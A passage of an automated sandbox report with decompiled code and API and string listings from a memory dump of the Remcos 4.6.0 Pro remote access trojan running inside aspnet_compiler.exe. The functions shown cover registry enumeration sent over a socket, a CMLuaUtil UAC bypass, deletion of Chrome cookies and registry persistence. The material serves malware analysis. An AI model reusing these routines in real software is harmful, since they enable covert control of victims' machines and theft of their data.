                    				_t123 =  &_v228 - 0x18;
                    				_v225 = __edx;
                    				_t116 = __ecx;
                    				E004020D6(_t61, _t123, __edx, __eflags,  &_a4);
                    				_t28 = E00412F64(_t61, __eflags);
                    				_t124 = _t123 + 0x18;
                    				_t62 = 0;
                    				if(RegOpenKeyExW(_t28, _t116, 0, 0x20019,  &_v228) != 0) {
                    					E00402073(0, _t124 - 0x18, _t103, _t120, "3");
                    					_push(0x72);
                    					E00404A81(0x473450, _t103, __eflags);
                    				} else {
                    					E00412D3D(_v224, _t103);
                    					_t35 = E0041A879(0,  &_v28, 0x473420);
                    					_t36 = E0041A879(0x473408,  &_v52, 0x473408);
                    					_t129 = _v225;
                    					_t107 =  ==  ? "0" : "1";
                    					_t114 = E00402EF0(0x473408,  &_v220, E00402EF0(0x473408,  &_v196, E00402EF0(0x473408,  &_v172, E00402E81( &_v148, E00402EF0(0x473408,  &_v124, E00402E81( &_v100, E004052FE( &_v76,  ==  ? "0" : "1", 0x473420, 0x472ec8), _t36), 0x473420, _v225, 0x472ec8), _t35), 0x473420, _v225, 0x472ec8), 0x473420, _v225, 0x473438), 0x473420, _t129, 0x472ec8);
                    					E00402EF0(0x473408, _t124 - 0x18, _t44, 0x473420, _t129, 0x4734d0);
                    					_push(0x71);
                    					E00404A81(0x473450, _t44, _t129);
                    					E00401FB8();
                    					E00401FB8();
                    					E00401FB8();
                    					E00401FB8();
                    					E00401FB8();
                    					E00401FB8();
                    					E00401FB8();
                    					E00401FB8();
                    					E00401FB8();
                    					L004086CB(0x473408, 0x473420, _t44, 0x46a8f0);
                    					L004086CB(0x473408, 0x473408, _t114, 0x46a8f0);
                    					L00405A86(0x473408, 0x473438, _t114, 0x464074);
                    					L00405A86(0x473408, 0x4734d0, _t114, 0x464074);
                    					RegCloseKey(_v268);
                    					_t62 = 1;
                    				}
                    				E00401FB8();
                    				return _t62;
                    			}

                    APIs
                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 0041302E
                      • Part of subcall function 00412D3D: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00412DA4
                      • Part of subcall function 00412D3D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00412DD3
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    • RegCloseKey.ADVAPI32(00000000,00464074,00464074,0046A8F0,0046A8F0,00000071), ref: 0041319C
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEnumInfoOpenQuerysend
                    • String ID: 4G$84G$P4G$P4G
                    • API String ID: 3114080316-1145574035
                    • Opcode ID: 7db01c843e7112b3844490c1095cc6af0e2be8480158fc6476740f208906a5c3
                    • Instruction ID: fd6b18073abc04bee90befd91301638a83fdde0089edac9dbf0f47121c2ff828
                    • Opcode Fuzzy Hash: 7db01c843e7112b3844490c1095cc6af0e2be8480158fc6476740f208906a5c3
                    • Instruction Fuzzy Hash: 6841F6316442005BC318FB65D992AEFB3989FD0348F40893FF149631D2EF7C5A0A969E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E0041A1E5(void* __ecx, void* __eflags) {
                    				char _v8;
                    				char _v12;
                    				char _v16;
                    				char _v20;
                    				char _v44;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				intOrPtr* _t23;
                    				intOrPtr* _t25;
                    				intOrPtr* _t27;
                    				void* _t34;
                    				void* _t43;
                    				char* _t50;
                    				void* _t57;
                    				void* _t60;
                    				void* _t61;
                    				void* _t65;
                    
                    				_t65 = __eflags;
                    				_t34 = __ecx;
                    				E00412903(__ecx, 0x80000000, L"http\\shell\\open\\command", 0);
                    				E004440A5(E00401EE4(_t34));
                    				E00401EF3(_t34, 0x80000000, _t57, E00408682(_t34,  &_v44, 0, E0041B7DE(_t34, L".exe") + 4));
                    				E00401EE9();
                    				_t43 = _t61 - 0x18;
                    				E004086D0(_t34, _t43, 0x80000000, _t65, _t34);
                    				_push(_t43);
                    				E00401EF3(_t34, 0x80000000, _t57, E0041A89D( &_v44, 0x80000000));
                    				E00401EE9();
                    				_t23 = E004022E5(_t34,  &_v8);
                    				_t25 = E004022AA(_t34,  &_v12);
                    				_t7 =  &_v16; // 0x40eb54
                    				_t27 = E004022E5(_t34, _t7);
                    				_t50 =  &_v20;
                    				E00409291(_t50,  *_t27,  *_t25,  *_t23);
                    				if(E0041AB12(_t50) != 0) {
                    					_push(_t50);
                    					_t56 = L"program files\\";
                    					_t59 = E0041B7DE(_t34, L"program files\\");
                    					if(_t31 != 0xffffffff) {
                    						E0041B84F(_t34, _t34, 0x80000000, _t56, _t60, _t59, E0043A3D6(L"program files\\"), L"program files (x86)\\");
                    					}
                    				}
                    				return _t34;
                    			}

                    APIs
                      • Part of subcall function 00412903: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,00473298), ref: 00412925
                      • Part of subcall function 00412903: RegQueryValueExW.ADVAPI32(?,0@,00000000,00000000,?,00000400), ref: 00412944
                      • Part of subcall function 00412903: RegCloseKey.ADVAPI32(?), ref: 0041294D
                      • Part of subcall function 0041AB12: GetCurrentProcess.KERNEL32(?,?,?,0040CFAE,WinDir,00000000,00000000), ref: 0041AB23
                    • _wcslen.LIBCMT ref: 0041A2BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                    • String ID: .exe$T@$http\shell\open\command$program files (x86)\$program files\
                    • API String ID: 37874593-902212947
                    • Opcode ID: 7143235bfe4027bcb31dec2376d12d4f12f2f92bf4d0ba9bee30b46b709c1ee2
                    • Instruction ID: 21aed5fb5d72de47c87afb81655524ea1d35e8d6521c3cb27bca8a170edf9ba1
                    • Opcode Fuzzy Hash: 7143235bfe4027bcb31dec2376d12d4f12f2f92bf4d0ba9bee30b46b709c1ee2
                    • Instruction Fuzzy Hash: 0E218871B001042BDB04BAB69C96EEE32AD9B44318F14057FF806B72C2ED7D9D5947AD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E00455453(char* _a4, short* _a8) {
                    				int _v8;
                    				void* __ecx;
                    				void* __esi;
                    				short* _t10;
                    				short* _t14;
                    				int _t15;
                    				short* _t16;
                    				void* _t26;
                    				int _t27;
                    				void* _t29;
                    				short* _t35;
                    				short* _t39;
                    				short* _t40;
                    
                    				_push(_t29);
                    				if(_a4 != 0) {
                    					_t39 = _a8;
                    					__eflags = _t39;
                    					if(__eflags != 0) {
                    						_push(_t26);
                    						E00446E61(_t29, _t39, __eflags);
                    						asm("sbb ebx, ebx");
                    						_t35 = 0;
                    						_t27 = _t26 + 1;
                    						 *_t39 = 0;
                    						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
                    						_v8 = _t10;
                    						__eflags = _t10;
                    						if(_t10 != 0) {
                    							_t40 = E00444A38(_t29, _t10 + _t10);
                    							__eflags = _t40;
                    							if(_t40 != 0) {
                    								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
                    								__eflags = _t15;
                    								if(_t15 != 0) {
                    									_t16 = _t40;
                    									_t40 = 0;
                    									_t35 = 1;
                    									__eflags = 1;
                    									 *_a8 = _t16;
                    								} else {
                    									E0043EE77(GetLastError());
                    								}
                    							}
                    							E00445002(_t40);
                    							_t14 = _t35;
                    						} else {
                    							E0043EE77(GetLastError());
                    							_t14 = 0;
                    						}
                    					} else {
                    						 *((intOrPtr*)(E0043EEAD())) = 0x16;
                    						E0043A5BB();
                    						_t14 = 0;
                    					}
                    					return _t14;
                    				}
                    				 *((intOrPtr*)(E0043EEAD())) = 0x16;
                    				E0043A5BB();
                    				return 0;
                    			}

                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1937e19eed58fd6eaa34ed345285247f5b202f0c51715d77c7ab66ce3919d979
                    • Instruction ID: 243b992db74428a8b8f40e07f5805634c7787d5acd7d10a8c2111fadf3c51f9b
                    • Opcode Fuzzy Hash: 1937e19eed58fd6eaa34ed345285247f5b202f0c51715d77c7ab66ce3919d979
                    • Instruction Fuzzy Hash: A6112731505605BBDB102F779C0597B3BA9EF86336B11066AFC11C7252EA38C8459269
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0044F77A(intOrPtr _a4) {
                    				void* _t18;
                    
                    				_t45 = _a4;
                    				if(_a4 != 0) {
                    					E0044F4C1(_t45, 7);
                    					E0044F4C1(_t45 + 0x1c, 7);
                    					E0044F4C1(_t45 + 0x38, 0xc);
                    					E0044F4C1(_t45 + 0x68, 0xc);
                    					E0044F4C1(_t45 + 0x98, 2);
                    					E00445002( *((intOrPtr*)(_t45 + 0xa0)));
                    					E00445002( *((intOrPtr*)(_t45 + 0xa4)));
                    					E00445002( *((intOrPtr*)(_t45 + 0xa8)));
                    					E0044F4C1(_t45 + 0xb4, 7);
                    					E0044F4C1(_t45 + 0xd0, 7);
                    					E0044F4C1(_t45 + 0xec, 0xc);
                    					E0044F4C1(_t45 + 0x11c, 0xc);
                    					E0044F4C1(_t45 + 0x14c, 2);
                    					E00445002( *((intOrPtr*)(_t45 + 0x154)));
                    					E00445002( *((intOrPtr*)(_t45 + 0x158)));
                    					E00445002( *((intOrPtr*)(_t45 + 0x15c)));
                    					return E00445002( *((intOrPtr*)(_t45 + 0x160)));
                    				}
                    				return _t18;
                    			}

                    APIs
                      • Part of subcall function 0044F4C1: _free.LIBCMT ref: 0044F4EA
                    • _free.LIBCMT ref: 0044F7C8
                      • Part of subcall function 00445002: RtlFreeHeap.NTDLL(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                      • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                    • _free.LIBCMT ref: 0044F7D3
                    • _free.LIBCMT ref: 0044F7DE
                    • _free.LIBCMT ref: 0044F832
                    • _free.LIBCMT ref: 0044F83D
                    • _free.LIBCMT ref: 0044F848
                    • _free.LIBCMT ref: 0044F853
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                    • Instruction ID: e20f7d93c4c1b7366c41c1c89a5bca39aa981d096f5eec7d46ef9b7b16274198
                    • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                    • Instruction Fuzzy Hash: C7117F71540B54AAEA30BBB2CC47FCF779C9F50708F81492FB39DA6052EA2CB5188794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E004106A6(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                    				void* _v8;
                    				char _v12;
                    				char _v24;
                    				intOrPtr _v36;
                    				intOrPtr* _t34;
                    				void* _t39;
                    				intOrPtr* _t42;
                    				intOrPtr* _t44;
                    
                    				E00433BCB( &_v12, 0);
                    				_t39 =  *0x474a78;
                    				_v8 = _t39;
                    				_t42 = E0040D696(_a4, E0040D5C5(0x474c68));
                    				if(_t42 != 0) {
                    					L5:
                    					E00433C23( &_v12);
                    					return _t42;
                    				} else {
                    					if(_t39 == 0) {
                    						__eflags = E0041076A(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
                    						if(__eflags == 0) {
                    							_t34 =  &_v24;
                    							E0040D491(_t34);
                    							E004379F6( &_v24, 0x46cd4c);
                    							asm("int3");
                    							_push(_t42);
                    							_t44 = _t34;
                    							E0040D38B(_t34, _v36);
                    							 *_t44 = 0x4582f4;
                    							return _t44;
                    						} else {
                    							_t42 = _v8;
                    							 *0x474a78 = _t42;
                    							 *((intOrPtr*)( *_t42 + 4))();
                    							E00433DDC(__eflags, _t42);
                    							goto L5;
                    						}
                    					} else {
                    						_t42 = _t39;
                    						goto L5;
                    					}
                    				}
                    			}












                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 004106B3
                    • int.LIBCPMT ref: 004106C6
                      • Part of subcall function 0040D5C5: std::_Lockit::_Lockit.LIBCPMT ref: 0040D5D6
                      • Part of subcall function 0040D5C5: std::_Lockit::~_Lockit.LIBCPMT ref: 0040D5F0
                    • std::_Facet_Register.LIBCPMT ref: 00410706
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0041070F
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041072D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                    • String ID: hLG
                    • API String ID: 2536120697-233936816
                    • Opcode ID: fe1dd14917883f67ba224efd1dee7036d7affe31d0fcfbb40d479355fe81f6d9
                    • Instruction ID: 7c3c20e224a2a00f7f7be6237b00d9c90688f6040d3be4d1753458cdbc359952
                    • Opcode Fuzzy Hash: fe1dd14917883f67ba224efd1dee7036d7affe31d0fcfbb40d479355fe81f6d9
                    • Instruction Fuzzy Hash: 96110A32900218ABCB11FBE5C8418DEBB689F84724F11056FF815672D1DF78AE85CBD8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E00438C57(void* __ecx) {
                    				void* _t4;
                    				void* _t11;
                    				void* _t16;
                    				long _t25;
                    				void* _t28;
                    
                    				if( *0x46f090 != 0xffffffff) {
                    					_t25 = GetLastError();
                    					_t11 = E004376D8(__eflags,  *0x46f090);
                    					__eflags = _t11 - 0xffffffff;
                    					if(_t11 == 0xffffffff) {
                    						L5:
                    						_t11 = 0;
                    					} else {
                    						__eflags = _t11;
                    						if(__eflags == 0) {
                    							_t4 = E00437712(__eflags,  *0x46f090, 0xffffffff);
                    							_pop(_t16);
                    							__eflags = _t4;
                    							if(_t4 != 0) {
                    								_t28 = E004443F4(_t16, 1, 0x28);
                    								__eflags = _t28;
                    								if(__eflags == 0) {
                    									L8:
                    									_t11 = 0;
                    									E00437712(__eflags,  *0x46f090, 0);
                    								} else {
                    									__eflags = E00437712(__eflags,  *0x46f090, _t28);
                    									if(__eflags != 0) {
                    										_t11 = _t28;
                    										_t28 = 0;
                    										__eflags = 0;
                    									} else {
                    										goto L8;
                    									}
                    								}
                    								E00445002(_t28);
                    							} else {
                    								goto L5;
                    							}
                    						}
                    					}
                    					SetLastError(_t25);
                    					return _t11;
                    				} else {
                    					return 0;
                    				}
                    			}









                    APIs
                    • GetLastError.KERNEL32(?,?,00438C4E,00437B8E), ref: 00438C65
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438C73
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00438C8C
                    • SetLastError.KERNEL32(00000000,?,00438C4E,00437B8E), ref: 00438CDE
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: 06d2b6d0d256db09040b2198e32479e012de82d5718a97fd6b90c10f44b40caa
                    • Instruction ID: 21f9491cf859890c7eadaa784ea30681ac294a37727d4d336c6cdb78a7d4fc19
                    • Opcode Fuzzy Hash: 06d2b6d0d256db09040b2198e32479e012de82d5718a97fd6b90c10f44b40caa
                    • Instruction Fuzzy Hash: 7001F73220E7126FE6242B797C86A2B6744DB09779F20323FF624456E2FF594C09726D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe), ref: 00406C44
                      • Part of subcall function 00406B71: _wcslen.LIBCMT ref: 00406B95
                      • Part of subcall function 00406B71: CoGetObject.OLE32(?,00000024,004644E0,00000000), ref: 00406BF6
                    • CoUninitialize.OLE32 ref: 00406C9D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: InitializeObjectUninitialize_wcslen
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                    • API String ID: 3851391207-1062857032
                    • Opcode ID: 21c6875a4e00bf3e9cd9c84db11fc7adaedb877f72474f7b3962a236dd4ca43a
                    • Instruction ID: 4a2b0e9ada28304c15679dea14e35c8bbb0126878905a56f40071f2f2dcd1631
                    • Opcode Fuzzy Hash: 21c6875a4e00bf3e9cd9c84db11fc7adaedb877f72474f7b3962a236dd4ca43a
                    • Instruction Fuzzy Hash: 5D01C0723093116FF7246B52EC0AF3B7798DB8176AF16013FF946A61C1EAB9EC004169
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E0040B01B(void* __edx, void* __edi, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				void* __ebx;
                    				void* __ebp;
                    				long _t18;
                    				void* _t20;
                    				void* _t21;
                    				void* _t28;
                    				void* _t32;
                    				void* _t33;
                    				void* _t34;
                    
                    				_t37 = __eflags;
                    				_t32 = __edi;
                    				_t31 = E00402073(_t20,  &_v52, __edx, _t33, E0043A9AA(_t20, __eflags, "UserProfile"));
                    				E00408832(_t20,  &_v28, _t7, _t32, _t33, _t37, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
                    				E00401FB8();
                    				if(DeleteFileA(E00401F8B( &_v28)) != 0) {
                    					_t28 = _t34 - 0x18;
                    					_push("\n[Chrome Cookies found, cleared!]");
                    					goto L6;
                    				} else {
                    					_t18 = GetLastError();
                    					if(_t18 == 0 || _t18 == 1) {
                    						_t28 = _t34 - 0x18;
                    						_push("\n[Chrome Cookies not found]");
                    						L6:
                    						E00402073(_t20, _t28, _t31, _t33);
                    						E0040B752(_t20, _t31, _t33, __eflags);
                    						_t21 = 1;
                    					} else {
                    						_t21 = 0;
                    					}
                    				}
                    				E00401FB8();
                    				return _t21;
                    			}















                    APIs
                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B057
                    • GetLastError.KERNEL32 ref: 0040B061
                    Strings
                    • [Chrome Cookies found, cleared!], xrefs: 0040B087
                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B022
                    • UserProfile, xrefs: 0040B027
                    • [Chrome Cookies not found], xrefs: 0040B07B
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteErrorFileLast
                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    • API String ID: 2018770650-304995407
                    • Opcode ID: ccdb3e1c20e372875c48605d81a56ec54d8c08013769e4607f37cdedbea4537f
                    • Instruction ID: f9fbcf48e46e0b37629b78e1018d25b522eb7a253e11c313dbfba25adce049df
                    • Opcode Fuzzy Hash: ccdb3e1c20e372875c48605d81a56ec54d8c08013769e4607f37cdedbea4537f
                    • Instruction Fuzzy Hash: FE01F271AC410666CA0476B5DD5BCBFBB28E951308B40027FF842721E2FF7A490586CF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 70%
                    			E0041B6A6(void* __ebx, void* __ecx, void* __edx, void* __edi) {
                    				char _v104;
                    				struct HWND__* _t7;
                    				void* _t24;
                    				void* _t28;
                    
                    				_t28 = __edi;
                    				_t26 = __ecx;
                    				_t24 = __ecx;
                    				AllocConsole();
                    				_t7 =  *0x472b0c(__ebx);
                    				_t32 = _t24;
                    				 *0x472b10 = _t7;
                    				if(_t24 == 0) {
                    					ShowWindow(_t7, 0);
                    				}
                    				E004404F2(_t26, "CONOUT$", "a", E0043AA88(1));
                    				SetConsoleOutputCP(0x4e4);
                    				E0041B663();
                    				E00435760(_t28,  &_v104, 0, 0x64);
                    				E00440830( &_v104, "\n\tRemcos v");
                    				E00440830( &_v104, "4.6.0 Pro");
                    				E00440830( &_v104, 0x46ae58);
                    				_push( &_v104);
                    				return E00406874(_t32);
                    			}








                    APIs
                    • AllocConsole.KERNEL32(00000000), ref: 0041B6AF
                    • ShowWindow.USER32(00000000,00000000), ref: 0041B6C8
                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041B6ED
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Console$AllocOutputShowWindow
                    • String ID: Remcos v$4.6.0 Pro$CONOUT$
                    • API String ID: 2425139147-579393372
                    • Opcode ID: 9fa98f7035d97c5e21b7ac84947d6802447a46aa1252a65f1097801335382c61
                    • Instruction ID: db7634a49a328e0f99b2c2d62409033857a76ccc0adaf027dd828388b15aa78f
                    • Opcode Fuzzy Hash: 9fa98f7035d97c5e21b7ac84947d6802447a46aa1252a65f1097801335382c61
                    • Instruction Fuzzy Hash: B1012171A903086BE600FBB19D4BF9D33ACAB14705F501427B604A7192EABD9924CA6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004068D4(void* __esi) {
                    				int _t5;
                    				void* _t7;
                    				void* _t8;
                    				void* _t13;
                    				void* _t20;
                    
                    				_t20 =  *0x46f9d0 - 1; // 0x1
                    				if(_t20 != 0) {
                    					__eflags =  *0x46f9d0 - 1;
                    					if(__eflags != 0) {
                    						CloseHandle( *0x470d44);
                    						__eflags = E00406E2B(__eflags);
                    						if(__eflags == 0) {
                    							_t13 = 0x470b38;
                    						} else {
                    							_t13 = E00401EE4(0x473220);
                    						}
                    						_t5 = E00406CE1(_t13, 0x46a8f0, __eflags);
                    						__eflags = _t5;
                    						if(_t5 == 0) {
                    							ExitProcess(_t5);
                    						}
                    						_t7 = CreateMutexA(0, 1, E00401F8B(0x473268));
                    						 *0x470d44 = _t7;
                    						_t8 = 2;
                    						return _t8;
                    					} else {
                    						__eflags = 1;
                    						return 1;
                    					}
                    				} else {
                    					return 1;
                    				}
                    			}









                    Strings
                    • 2G, xrefs: 00406D18
                    • h2G, xrefs: 00406D4E
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, xrefs: 00406D38
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 2G$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$h2G
                    • API String ID: 0-4004919476
                    • Opcode ID: 92e795556d06f7862d4405b4de2f92de10a8eb4fdc52b867a4f6e0daf799e8ad
                    • Instruction ID: 7dfc231a9bb00e149e5c0c7810f67d20ab7eac2a910a21db205252ecd238aa05
                    • Opcode Fuzzy Hash: 92e795556d06f7862d4405b4de2f92de10a8eb4fdc52b867a4f6e0daf799e8ad
                    • Instruction Fuzzy Hash: AEF0F670706311EBDB102B70AD0926A2616EB40306F01447BF84BEA2E1EB7D8852965E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E00412AFC(void* __ecx, short* __edx, short* _a4, char _a8) {
                    				void* _v8;
                    				signed int _t16;
                    				char* _t18;
                    				long _t19;
                    				signed int _t21;
                    				signed int _t22;
                    
                    				_push(__ecx);
                    				_push(_t21);
                    				_t1 =  &_v8; // 0x473220
                    				if(RegCreateKeyW(__ecx, __edx, _t1) != 0) {
                    					_t22 = 0;
                    				} else {
                    					_t16 = E0040245C();
                    					_t3 =  &_a8; // 0x40ed66
                    					_t18 = E00401EE4(_t3);
                    					_t7 =  &_v8; // 0x473220
                    					_t19 = RegSetValueExW( *_t7, _a4, 0, 1, _t18, 2 + _t16 * 2);
                    					RegCloseKey(_v8);
                    					_t22 = _t21 & 0xffffff00 | _t19 == 0x00000000;
                    				}
                    				E00401EE9();
                    				return _t22;
                    			}










                    APIs
                    • RegCreateKeyW.ADVAPI32(80000001,00000000, 2G), ref: 00412B07
                    • RegSetValueExW.ADVAPI32( 2G,?,00000000,00000001,00000000,00000000,00473238,?,0040ED66,pth_unenc,00473220), ref: 00412B35
                    • RegCloseKey.ADVAPI32(?,?,0040ED66,pth_unenc,00473220), ref: 00412B40
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID: 2G$f@$pth_unenc
                    • API String ID: 1818849710-3782201451
                    • Opcode ID: 85f8060158c98b0086e305dbbba25e94d6297c9d6cf8cbc8c1938ce2977c46b4
                    • Instruction ID: 0c8d3bccce686eec099df141ad345258a3ef415a4a3ae97405fd51eab9751fc6
                    • Opcode Fuzzy Hash: 85f8060158c98b0086e305dbbba25e94d6297c9d6cf8cbc8c1938ce2977c46b4
                    • Instruction Fuzzy Hash: 1CF0C231444218BBCF009FA1ED86FEE37ACEB00754F00412AB805A61A1E6759E04DA94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E004393DC(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
                    				intOrPtr _v0;
                    				char _v8;
                    				signed int _v12;
                    				char _v16;
                    				signed int _v20;
                    				char _v24;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t61;
                    				void* _t64;
                    				signed int _t67;
                    				signed int _t69;
                    				signed int _t70;
                    				signed int _t73;
                    				signed int _t75;
                    				signed int _t77;
                    				signed int _t78;
                    				intOrPtr _t80;
                    				signed int _t81;
                    				void* _t82;
                    				signed int _t84;
                    				void* _t85;
                    				signed int _t87;
                    				signed int _t93;
                    				signed int _t102;
                    				void* _t104;
                    				signed int _t107;
                    				signed int* _t110;
                    				signed int* _t111;
                    				intOrPtr* _t113;
                    				signed int _t118;
                    				signed int _t120;
                    				signed int _t123;
                    				void* _t125;
                    				signed int _t128;
                    				signed int _t131;
                    				signed int _t139;
                    				signed int _t145;
                    				void _t147;
                    				void* _t148;
                    				void* _t150;
                    				void* _t152;
                    				signed int _t153;
                    				signed int _t154;
                    				void* _t155;
                    				signed int _t156;
                    				signed int _t157;
                    				signed int _t158;
                    				intOrPtr _t159;
                    
                    				_t139 = __edx;
                    				_t155 = _a4;
                    				if(_t155 == 0) {
                    					_t113 = E0043EEAD();
                    					_t159 = 0x16;
                    					 *_t113 = _t159;
                    					E0043A5BB();
                    					return _t159;
                    				}
                    				_push(__edi);
                    				_t123 = 9;
                    				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
                    				_t145 = _a8;
                    				__eflags = _t145;
                    				if(_t145 == 0) {
                    					_t111 = E0043EEAD();
                    					_t158 = 0x16;
                    					 *_t111 = _t158;
                    					E0043A5BB();
                    					_t78 = _t158;
                    					L12:
                    					return _t78;
                    				}
                    				_push(__ebx);
                    				__eflags =  *(_t145 + 4);
                    				if(__eflags <= 0) {
                    					if(__eflags < 0) {
                    						L10:
                    						_t110 = E0043EEAD();
                    						_t157 = 0x16;
                    						 *_t110 = _t157;
                    						_t78 = _t157;
                    						L11:
                    						goto L12;
                    					}
                    					__eflags =  *_t145;
